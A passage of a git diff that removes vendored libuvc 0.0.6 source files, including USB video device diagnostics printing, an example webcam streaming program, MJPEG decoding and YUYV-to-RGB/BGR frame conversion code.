-      uvc_format_desc_t *fmt_desc;
-
-      ++stream_idx;
-
-      fprintf(stream, "VideoStreaming(%d):\n"
-          "\tbEndpointAddress: %d\n\tFormats:\n",
-          stream_idx, stream_if->bEndpointAddress);
-
-      DL_FOREACH(stream_if->format_descs, fmt_desc) {
-        uvc_frame_desc_t *frame_desc;
-        int i;
-
-        switch (fmt_desc->bDescriptorSubtype) {
-          case UVC_VS_FORMAT_UNCOMPRESSED:
-          case UVC_VS_FORMAT_MJPEG:
-          case UVC_VS_FORMAT_FRAME_BASED:
-            fprintf(stream,
-                "\t\%s(%d)\n"
-                "\t\t  bits per pixel: %d\n"
-                "\t\t  GUID: ",
-                _uvc_name_for_format_subtype(fmt_desc->bDescriptorSubtype),
-                fmt_desc->bFormatIndex,
-                fmt_desc->bBitsPerPixel);
-
-            for (i = 0; i < 16; ++i)
-              fprintf(stream, "%02x", fmt_desc->guidFormat[i]);
-
-            fprintf(stream, " (%4s)\n", fmt_desc->fourccFormat );
-
-            fprintf(stream,
-                "\t\t  default frame: %d\n"
-                "\t\t  aspect ratio: %dx%d\n"
-                "\t\t  interlace flags: %02x\n"
-                "\t\t  copy protect: %02x\n",
-                fmt_desc->bDefaultFrameIndex,
-                fmt_desc->bAspectRatioX,
-                fmt_desc->bAspectRatioY,
-                fmt_desc->bmInterlaceFlags,
-                fmt_desc->bCopyProtect);
-
-            DL_FOREACH(fmt_desc->frame_descs, frame_desc) {
-              uint32_t *interval_ptr;
-
-              fprintf(stream,
-                  "\t\t\tFrameDescriptor(%d)\n"
-                  "\t\t\t  capabilities: %02x\n"
-                  "\t\t\t  size: %dx%d\n"
-                  "\t\t\t  bit rate: %d-%d\n"
-                  "\t\t\t  max frame size: %d\n"
-                  "\t\t\t  default interval: 1/%d\n",
-                  frame_desc->bFrameIndex,
-                  frame_desc->bmCapabilities,
-                  frame_desc->wWidth,
-                  frame_desc->wHeight,
-                  frame_desc->dwMinBitRate,
-                  frame_desc->dwMaxBitRate,
-                  frame_desc->dwMaxVideoFrameBufferSize,
-                  10000000 / frame_desc->dwDefaultFrameInterval);
-              if (frame_desc->intervals) {
-                for (interval_ptr = frame_desc->intervals;
-                     *interval_ptr;
-                     ++interval_ptr) {
-                  fprintf(stream,
-                      "\t\t\t  interval[%d]: 1/%d\n",
-		      (int) (interval_ptr - frame_desc->intervals),
-		      10000000 / *interval_ptr);
-                }
-              } else {
-                fprintf(stream,
-                    "\t\t\t  min interval[%d] = 1/%d\n"
-                    "\t\t\t  max interval[%d] = 1/%d\n",
-                    frame_desc->dwMinFrameInterval,
-                    10000000 / frame_desc->dwMinFrameInterval,
-                    frame_desc->dwMaxFrameInterval,
-                    10000000 / frame_desc->dwMaxFrameInterval);
-                if (frame_desc->dwFrameIntervalStep)
-                  fprintf(stream,
-                      "\t\t\t  interval step[%d] = 1/%d\n",
-                      frame_desc->dwFrameIntervalStep,
-                      10000000 / frame_desc->dwFrameIntervalStep);
-              }
-            }
-            break;
-          default:
-            fprintf(stream, "\t-UnknownFormat (%d)\n",
-                fmt_desc->bDescriptorSubtype );
-        }
-      }
-    }
-
-    fprintf(stream, "END DEVICE CONFIGURATION\n");
-  } else {
-    fprintf(stream, "uvc_print_diag: Device not configured!\n");
-  }
-}
-
-/** @brief Print all possible frame configuration.
- * @ingroup diag
- *
- * @param devh UVC device
- * @param stream Output stream (stderr if NULL)
- */
-void uvc_print_frameformats(uvc_device_handle_t *devh) {
-
-  if (devh->info->ctrl_if.bcdUVC) {
-    uvc_streaming_interface_t *stream_if;
-    int stream_idx = 0;
-    DL_FOREACH(devh->info->stream_ifs, stream_if) {
-      uvc_format_desc_t *fmt_desc;
-      ++stream_idx;
-
-      DL_FOREACH(stream_if->format_descs, fmt_desc) {
-        uvc_frame_desc_t *frame_desc;
-        int i;
-
-        switch (fmt_desc->bDescriptorSubtype) {
-          case UVC_VS_FORMAT_UNCOMPRESSED:
-          case UVC_VS_FORMAT_MJPEG:
-          case UVC_VS_FORMAT_FRAME_BASED:
-            printf("         \%s(%d)\n"
-                "            bits per pixel: %d\n"
-                "            GUID: ",
-                _uvc_name_for_format_subtype(fmt_desc->bDescriptorSubtype),
-                fmt_desc->bFormatIndex,
-                fmt_desc->bBitsPerPixel);
-
-            for (i = 0; i < 16; ++i)
-              printf("%02x", fmt_desc->guidFormat[i]);
-
-            printf(" (%4s)\n", fmt_desc->fourccFormat );
-
-            printf("            default frame: %d\n"
-                "            aspect ratio: %dx%d\n"
-                "            interlace flags: %02x\n"
-                "            copy protect: %02x\n",
-                fmt_desc->bDefaultFrameIndex,
-                fmt_desc->bAspectRatioX,
-                fmt_desc->bAspectRatioY,
-                fmt_desc->bmInterlaceFlags,
-                fmt_desc->bCopyProtect);
-
-            DL_FOREACH(fmt_desc->frame_descs, frame_desc) {
-              uint32_t *interval_ptr;
-
-              printf("               FrameDescriptor(%d)\n"
-                  "                  capabilities: %02x\n"
-                  "                  size: %dx%d\n"
-                  "                  bit rate: %d-%d\n"
-                  "                  max frame size: %d\n"
-                  "                  default interval: 1/%d\n",
-                  frame_desc->bFrameIndex,
-                  frame_desc->bmCapabilities,
-                  frame_desc->wWidth,
-                  frame_desc->wHeight,
-                  frame_desc->dwMinBitRate,
-                  frame_desc->dwMaxBitRate,
-                  frame_desc->dwMaxVideoFrameBufferSize,
-                  10000000 / frame_desc->dwDefaultFrameInterval);
-              if (frame_desc->intervals) {
-                for (interval_ptr = frame_desc->intervals;
-                     *interval_ptr;
-                     ++interval_ptr) {
-                  printf("                  interval[%d]: 1/%d\n",
-		      (int) (interval_ptr - frame_desc->intervals),
-		      10000000 / *interval_ptr);
-                }
-              } else {
-                printf("                  min interval[%d] = 1/%d\n"
-                    "                  max interval[%d] = 1/%d\n",
-                    frame_desc->dwMinFrameInterval,
-                    10000000 / frame_desc->dwMinFrameInterval,
-                    frame_desc->dwMaxFrameInterval,
-                    10000000 / frame_desc->dwMaxFrameInterval);
-                if (frame_desc->dwFrameIntervalStep)
-                  printf("                  interval step[%d] = 1/%d\n",
-                      frame_desc->dwFrameIntervalStep,
-                      10000000 / frame_desc->dwFrameIntervalStep);
-              }
-            }
-            break;
-          default:
-            printf("\t-UnknownFormat (%d)\n",fmt_desc->bDescriptorSubtype );
-        }
-      }
-    }
-  } else {
-    printf("uvc_print_frameformats: Device not configured!\n");
-  }
-}
diff --git a/thirdparty/libuvc-0.0.6/src/example.c b/thirdparty/libuvc-0.0.6/src/example.c
deleted file mode 100644
index 8178cbf..0000000
--- a/thirdparty/libuvc-0.0.6/src/example.c
+++ /dev/null
@@ -1,148 +0,0 @@
-#include "libuvc/libuvc.h"
-#include <stdio.h>
-
-/* This callback function runs once per frame. Use it to perform any
- * quick processing you need, or have it put the frame into your application's
- * input queue. If this function takes too long, you'll start losing frames. */
-void cb(uvc_frame_t *frame, void *ptr) {
-  uvc_frame_t *bgr;
-  uvc_error_t ret;
-
-  /* We'll convert the image from YUV/JPEG to BGR, so allocate space */
-  bgr = uvc_allocate_frame(frame->width * frame->height * 3);
-  if (!bgr) {
-    printf("unable to allocate bgr frame!");
-    return;
-  }
-
-  /* Do the BGR conversion */
-  ret = uvc_any2bgr(frame, bgr);
-  if (ret) {
-    uvc_perror(ret, "uvc_any2bgr");
-    uvc_free_frame(bgr);
-    return;
-  }
-
-  /* Call a user function:
-   *
-   * my_type *my_obj = (*my_type) ptr;
-   * my_user_function(ptr, bgr);
-   * my_other_function(ptr, bgr->data, bgr->width, bgr->height);
-   */
-
-  /* Call a C++ method:
-   *
-   * my_type *my_obj = (*my_type) ptr;
-   * my_obj->my_func(bgr);
-   */
-
-  /* Use opencv.highgui to display the image:
-   * 
-   * cvImg = cvCreateImageHeader(
-   *     cvSize(bgr->width, bgr->height),
-   *     IPL_DEPTH_8U,
-   *     3);
-   *
-   * cvSetData(cvImg, bgr->data, bgr->width * 3); 
-   *
-   * cvNamedWindow("Test", CV_WINDOW_AUTOSIZE);
-   * cvShowImage("Test", cvImg);
-   * cvWaitKey(10);
-   *
-   * cvReleaseImageHeader(&cvImg);
-   */
-
-  uvc_free_frame(bgr);
-}
-
-int main(int argc, char **argv) {
-  uvc_context_t *ctx;
-  uvc_device_t *dev;
-  uvc_device_handle_t *devh;
-  uvc_stream_ctrl_t ctrl;
-  uvc_error_t res;
-
-  /* Initialize a UVC service context. Libuvc will set up its own libusb
-   * context. Replace NULL with a libusb_context pointer to run libuvc
-   * from an existing libusb context. */
-  res = uvc_init(&ctx, NULL);
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_init");
-    return res;
-  }
-
-  puts("UVC initialized");
-
-  /* Locates the first attached UVC device, stores in dev */
-  res = uvc_find_device(
-      ctx, &dev,
-      0, 0, NULL); /* filter devices: vendor_id, product_id, "serial_num" */
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_find_device"); /* no devices found */
-  } else {
-    puts("Device found");
-
-    /* Try to open the device: requires exclusive access */
-    res = uvc_open(dev, &devh);
-
-    if (res < 0) {
-      uvc_perror(res, "uvc_open"); /* unable to open device */
-    } else {
-      puts("Device opened");
-
-      /* Print out a message containing all the information that libuvc
-       * knows about the device */
-      uvc_print_diag(devh, stderr);
-
-      /* Try to negotiate a 640x480 30 fps YUYV stream profile */
-      res = uvc_get_stream_ctrl_format_size(
-          devh, &ctrl, /* result stored in ctrl */
-          UVC_FRAME_FORMAT_YUYV, /* YUV 422, aka YUV 4:2:2. try _COMPRESSED */
-          640, 480, 30 /* width, height, fps */
-      );
-
-      /* Print out the result */
-      uvc_print_stream_ctrl(&ctrl, stderr);
-
-      if (res < 0) {
-        uvc_perror(res, "get_mode"); /* device doesn't provide a matching stream */
-      } else {
-        /* Start the video stream. The library will call user function cb:
-         *   cb(frame, (void*) 12345)
-         */
-        res = uvc_start_streaming(devh, &ctrl, cb, 12345, 0);
-
-        if (res < 0) {
-          uvc_perror(res, "start_streaming"); /* unable to start stream */
-        } else {
-          puts("Streaming...");
-
-          uvc_set_ae_mode(devh, 1); /* e.g., turn on auto exposure */
-
-          sleep(10); /* stream for 10 seconds */
-
-          /* End the stream. Blocks until last callback is serviced */
-          uvc_stop_streaming(devh);
-          puts("Done streaming.");
-        }
-      }
-
-      /* Release our handle on the device */
-      uvc_close(devh);
-      puts("Device closed");
-    }
-
-    /* Release the device descriptor */
-    uvc_unref_device(dev);
-  }
-
-  /* Close the UVC context. This closes and cleans up any existing device handles,
-   * and it closes the libusb context if one was not provided. */
-  uvc_exit(ctx);
-  puts("UVC exited");
-
-  return 0;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/frame-mjpeg.c b/thirdparty/libuvc-0.0.6/src/frame-mjpeg.c
deleted file mode 100644
index d2a3fee..0000000
--- a/thirdparty/libuvc-0.0.6/src/frame-mjpeg.c
+++ /dev/null
@@ -1,187 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2014 Robert Xiao
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-
-/**
- * @defgroup frame Frame processing
- */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-#include <jpeglib.h>
-#include <setjmp.h>
-
-extern uvc_error_t uvc_ensure_frame_size(uvc_frame_t *frame, size_t need_bytes);
-
-struct error_mgr {
-  struct jpeg_error_mgr super;
-  jmp_buf jmp;
-};
-
-static void _error_exit(j_common_ptr dinfo) {
-  struct error_mgr *myerr = (struct error_mgr *)dinfo->err;
-  (*dinfo->err->output_message)(dinfo);
-  longjmp(myerr->jmp, 1);
-}
-
-/* ISO/IEC 10918-1:1993(E) K.3.3. Default Huffman tables used by MJPEG UVC devices
-   which don't specify a Huffman table in the JPEG stream. */
-static const unsigned char dc_lumi_len[] = 
-  {0, 0, 1, 5, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0};
-static const unsigned char dc_lumi_val[] = 
-  {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11};
-
-static const unsigned char dc_chromi_len[] = 
-  {0, 0, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0};
-static const unsigned char dc_chromi_val[] = 
-  {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11};
-
-static const unsigned char ac_lumi_len[] = 
-  {0, 0, 2, 1, 3, 3, 2, 4, 3, 5, 5, 4, 4, 0, 0, 1, 0x7d};
-static const unsigned char ac_lumi_val[] = 
-  {0x01, 0x02, 0x03, 0x00, 0x04, 0x11, 0x05, 0x12, 0x21,
-   0x31, 0x41, 0x06, 0x13, 0x51, 0x61, 0x07, 0x22, 0x71,
-   0x14, 0x32, 0x81, 0x91, 0xa1, 0x08, 0x23, 0x42, 0xb1,
-   0xc1, 0x15, 0x52, 0xd1, 0xf0, 0x24, 0x33, 0x62, 0x72,
-   0x82, 0x09, 0x0a, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x25,
-   0x26, 0x27, 0x28, 0x29, 0x2a, 0x34, 0x35, 0x36, 0x37,
-   0x38, 0x39, 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48,
-   0x49, 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59,
-   0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a,
-   0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a, 0x83,
-   0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8a, 0x92, 0x93,
-   0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9a, 0xa2, 0xa3,
-   0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xb2, 0xb3,
-   0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xc2, 0xc3,
-   0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9, 0xca, 0xd2, 0xd3,
-   0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda, 0xe1, 0xe2,
-   0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea, 0xf1,
-   0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa};
-static const unsigned char ac_chromi_len[] = 
-  {0, 0, 2, 1, 2, 4, 4, 3, 4, 7, 5, 4, 4, 0, 1, 2, 0x77};
-static const unsigned char ac_chromi_val[] = 
-  {0x00, 0x01, 0x02, 0x03, 0x11, 0x04, 0x05, 0x21, 0x31,
-   0x06, 0x12, 0x41, 0x51, 0x07, 0x61, 0x71, 0x13, 0x22,
-   0x32, 0x81, 0x08, 0x14, 0x42, 0x91, 0xa1, 0xb1, 0xc1,
-   0x09, 0x23, 0x33, 0x52, 0xf0, 0x15, 0x62, 0x72, 0xd1,
-   0x0a, 0x16, 0x24, 0x34, 0xe1, 0x25, 0xf1, 0x17, 0x18,
-   0x19, 0x1a, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x35, 0x36,
-   0x37, 0x38, 0x39, 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47,
-   0x48, 0x49, 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
-   0x59, 0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69,
-   0x6a, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a,
-   0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8a,
-   0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9a,
-   0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa,
-   0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba,
-   0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9, 0xca,
-   0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda,
-   0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea,
-   0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa};
-
-#define COPY_HUFF_TABLE(dinfo,tbl,name) do { \
-  if(dinfo->tbl == NULL) dinfo->tbl = jpeg_alloc_huff_table((j_common_ptr)dinfo); \
-  memcpy(dinfo->tbl->bits, name##_len, sizeof(name##_len)); \
-  memset(dinfo->tbl->huffval, 0, sizeof(dinfo->tbl->huffval)); \
-  memcpy(dinfo->tbl->huffval, name##_val, sizeof(name##_val)); \
-} while(0)
-
-static void insert_huff_tables(j_decompress_ptr dinfo) {
-  COPY_HUFF_TABLE(dinfo, dc_huff_tbl_ptrs[0], dc_lumi);
-  COPY_HUFF_TABLE(dinfo, dc_huff_tbl_ptrs[1], dc_chromi);
-  COPY_HUFF_TABLE(dinfo, ac_huff_tbl_ptrs[0], ac_lumi);
-  COPY_HUFF_TABLE(dinfo, ac_huff_tbl_ptrs[1], ac_chromi);
-}
-
-/** @brief Convert an MJPEG frame to RGB
- * @ingroup frame
- *
- * @param in MJPEG frame
- * @param out RGB frame
- */
-uvc_error_t uvc_mjpeg2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  struct jpeg_decompress_struct dinfo;
-  struct error_mgr jerr;
-  size_t lines_read;
-
-  if (in->frame_format != UVC_FRAME_FORMAT_MJPEG)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_RGB;
-  out->step = in->width * 3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  dinfo.err = jpeg_std_error(&jerr.super);
-  jerr.super.error_exit = _error_exit;
-
-  if (setjmp(jerr.jmp)) {
-    goto fail;
-  }
-
-  jpeg_create_decompress(&dinfo);
-  jpeg_mem_src(&dinfo, in->data, in->data_bytes);
-  jpeg_read_header(&dinfo, TRUE);
-
-  if (dinfo.dc_huff_tbl_ptrs[0] == NULL) {
-    /* This frame is missing the Huffman tables: fill in the standard ones */
-    insert_huff_tables(&dinfo);
-  }
-
-  dinfo.out_color_space = JCS_RGB;
-  dinfo.dct_method = JDCT_IFAST;
-
-  jpeg_start_decompress(&dinfo);
-
-  lines_read = 0;
-  while (dinfo.output_scanline < dinfo.output_height) {
-    unsigned char *buffer[1] = {( unsigned char*) out->data + lines_read * out->step };
-    int num_scanlines;
-
-    num_scanlines = jpeg_read_scanlines(&dinfo, buffer, 1);
-    lines_read += num_scanlines;
-  }
-
-  jpeg_finish_decompress(&dinfo);
-  jpeg_destroy_decompress(&dinfo);
-  return 0;
-
-fail:
-  jpeg_destroy_decompress(&dinfo);
-  return UVC_ERROR_OTHER;
-}
diff --git a/thirdparty/libuvc-0.0.6/src/frame.c b/thirdparty/libuvc-0.0.6/src/frame.c
deleted file mode 100644
index 35dfce4..0000000
--- a/thirdparty/libuvc-0.0.6/src/frame.c
+++ /dev/null
@@ -1,449 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup frame Frame processing
- * @brief Tools for managing frame buffers and converting between image formats
- */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-/** @internal */
-uvc_error_t uvc_ensure_frame_size(uvc_frame_t *frame, size_t need_bytes) {
-  if (frame->library_owns_data) {
-    if (!frame->data || frame->data_bytes != need_bytes) {
-      frame->data_bytes = need_bytes;
-      frame->data = realloc(frame->data, frame->data_bytes);
-    }
-    if (!frame->data)
-      return UVC_ERROR_NO_MEM;
-    return UVC_SUCCESS;
-  } else {
-    if (!frame->data || frame->data_bytes < need_bytes)
-      return UVC_ERROR_NO_MEM;
-    return UVC_SUCCESS;
-  }
-}
-
-/** @brief Allocate a frame structure
- * @ingroup frame
- *
- * @param data_bytes Number of bytes to allocate, or zero
- * @return New frame, or NULL on error
- */
-uvc_frame_t *uvc_allocate_frame(size_t data_bytes) {
-  uvc_frame_t *frame = malloc(sizeof(*frame));
-
-  if (!frame)
-    return NULL;
-
-  memset(frame, 0, sizeof(*frame));
-
-  frame->library_owns_data = 1;
-
-  if (data_bytes > 0) {
-    frame->data_bytes = data_bytes;
-    frame->data = malloc(data_bytes);
-
-    if (!frame->data) {
-      free(frame);
-      return NULL;
-    }
-  }
-
-  return frame;
-}
-
-/** @brief Free a frame structure
- * @ingroup frame
- *
- * @param frame Frame to destroy
- */
-void uvc_free_frame(uvc_frame_t *frame) {
-  if (frame->data_bytes > 0 && frame->library_owns_data)
-    free(frame->data);
-
-  free(frame);
-}
-
-static inline unsigned char sat(int i) {
-  return (unsigned char)( i >= 255 ? 255 : (i < 0 ? 0 : i));
-}
-
-/** @brief Duplicate a frame, preserving color format
- * @ingroup frame
- *
- * @param in Original frame
- * @param out Duplicate frame
- */
-uvc_error_t uvc_duplicate_frame(uvc_frame_t *in, uvc_frame_t *out) {
-  if (uvc_ensure_frame_size(out, in->data_bytes) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = in->frame_format;
-  out->step = in->step;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  memcpy(out->data, in->data, in->data_bytes);
-
-  return UVC_SUCCESS;
-}
-
-#define YUYV2RGB_2(pyuv, prgb) { \
-    float r = 1.402f * ((pyuv)[3]-128); \
-    float g = -0.34414f * ((pyuv)[1]-128) - 0.71414f * ((pyuv)[3]-128); \
-    float b = 1.772f * ((pyuv)[1]-128); \
-    (prgb)[0] = sat(pyuv[0] + r); \
-    (prgb)[1] = sat(pyuv[0] + g); \
-    (prgb)[2] = sat(pyuv[0] + b); \
-    (prgb)[3] = sat(pyuv[2] + r); \
-    (prgb)[4] = sat(pyuv[2] + g); \
-    (prgb)[5] = sat(pyuv[2] + b); \
-    }
-#define IYUYV2RGB_2(pyuv, prgb) { \
-    int r = (22987 * ((pyuv)[3] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[1] - 128) - 11698 * ((pyuv)[3] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[1] - 128)) >> 14; \
-    (prgb)[0] = sat(*(pyuv) + r); \
-    (prgb)[1] = sat(*(pyuv) + g); \
-    (prgb)[2] = sat(*(pyuv) + b); \
-    (prgb)[3] = sat((pyuv)[2] + r); \
-    (prgb)[4] = sat((pyuv)[2] + g); \
-    (prgb)[5] = sat((pyuv)[2] + b); \
-    }
-#define IYUYV2RGB_16(pyuv, prgb) IYUYV2RGB_8(pyuv, prgb); IYUYV2RGB_8(pyuv + 16, prgb + 24);
-#define IYUYV2RGB_8(pyuv, prgb) IYUYV2RGB_4(pyuv, prgb); IYUYV2RGB_4(pyuv + 8, prgb + 12);
-#define IYUYV2RGB_4(pyuv, prgb) IYUYV2RGB_2(pyuv, prgb); IYUYV2RGB_2(pyuv + 4, prgb + 6);
-
-/** @brief Convert a frame from YUYV to RGB
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out RGB frame
- */
-uvc_error_t uvc_yuyv2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_RGB;
-  out->step = in->width * 3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *prgb = out->data;
-  uint8_t *prgb_end = prgb + out->data_bytes;
-
-  while (prgb < prgb_end) {
-    IYUYV2RGB_8(pyuv, prgb);
-
-    prgb += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IYUYV2BGR_2(pyuv, pbgr) { \
-    int r = (22987 * ((pyuv)[3] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[1] - 128) - 11698 * ((pyuv)[3] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[1] - 128)) >> 14; \
-    (pbgr)[0] = sat(*(pyuv) + b); \
-    (pbgr)[1] = sat(*(pyuv) + g); \
-    (pbgr)[2] = sat(*(pyuv) + r); \
-    (pbgr)[3] = sat((pyuv)[2] + b); \
-    (pbgr)[4] = sat((pyuv)[2] + g); \
-    (pbgr)[5] = sat((pyuv)[2] + r); \
-    }
-#define IYUYV2BGR_16(pyuv, pbgr) IYUYV2BGR_8(pyuv, pbgr); IYUYV2BGR_8(pyuv + 16, pbgr + 24);
-#define IYUYV2BGR_8(pyuv, pbgr) IYUYV2BGR_4(pyuv, pbgr); IYUYV2BGR_4(pyuv + 8, pbgr + 12);
-#define IYUYV2BGR_4(pyuv, pbgr) IYUYV2BGR_2(pyuv, pbgr); IYUYV2BGR_2(pyuv + 4, pbgr + 6);
-
-/** @brief Convert a frame from YUYV to BGR
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out BGR frame
- */
-uvc_error_t uvc_yuyv2bgr(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_BGR;
-  out->step = in->width * 3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *pbgr = out->data;
-  uint8_t *pbgr_end = pbgr + out->data_bytes;
-
-  while (pbgr < pbgr_end) {
-    IYUYV2BGR_8(pyuv, pbgr);
-
-    pbgr += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IYUYV2Y(pyuv, py) { \
-    (py)[0] = (pyuv[0]); \
-    }
-
-/** @brief Convert a frame from YUYV to Y (GRAY8)
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out GRAY8 frame
- */
-uvc_error_t uvc_yuyv2y(uvc_frame_t *in, uvc_frame_t *out) {
